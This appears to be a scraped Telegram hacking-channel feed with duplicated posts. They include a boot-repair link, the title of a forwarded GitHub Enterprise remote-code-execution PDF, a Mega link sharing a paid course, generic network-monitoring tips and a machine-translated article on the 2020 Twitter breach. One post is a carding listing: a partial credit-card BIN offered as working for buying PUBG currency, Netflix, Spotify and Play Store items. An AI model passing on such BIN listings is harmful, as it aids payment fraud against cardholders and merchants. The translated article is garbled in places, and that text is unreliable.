▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Best Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
Forwarded from UNDERCODE COMMUNITY
GitHub Enterprise Remote Code Execution.pdf
208 KB
GitHub Enterprise Remote Code Execution
Forwarded from Backup Legal Mega
🦑Grow a Profitable Affiliate Website with Long Tail Keywords That Ranks in Google. Learn from people with experience, and build a successful online business…
https://insider.nichepursuits.com/sign-up
Mega link:
https://mega.nz/folder/RYxmyIDS#dG6ASQ2bFuqbYMncFrtuZg
https://insider.nichepursuits.com/sign-up
Mega link:
https://mega.nz/folder/RYxmyIDS#dG6ASQ2bFuqbYMncFrtuZg
Nichepursuits
Niche Pursuits Insider
Get the real-time blueprints and insider network you need to grow your online business.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
BIN Multifunctional:(PUBG)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA 🇺🇸
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA 🇺🇸
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑We all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitter’s initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
“Large companies and individuals’ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don’t know how the attack happened Yes, I don’t know how much damage to Twitter’s own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
🦑We all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitter’s initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
“Large companies and individuals’ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We don’t know how the attack happened Yes, I don’t know how much damage to Twitter’s own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
Continuing speculation will inevitably appear irresponsible, but Cox’s report has at least stated that this is not a simple and ordinary hacking incident. One possibility is that a hacker broke Twitter’s internal tools; Cox also proposed another possibility. There are ghosts in Twitter employees who participated in this attack-if that is the case, then Twitter is really a lottery in the year. Twice.
In either case, Twitter’s response to this incident has caused further confusion. The company’s earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
In either case, Twitter’s response to this incident has caused further confusion. The company’s earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁